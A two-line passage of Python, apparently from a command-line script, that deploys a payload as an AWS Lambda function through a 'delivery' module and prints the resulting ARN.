        arn = delivery.deploy_aws_lambda(args.function_name, payload)
        print(f"Deployed to AWS Lambda: {arn}")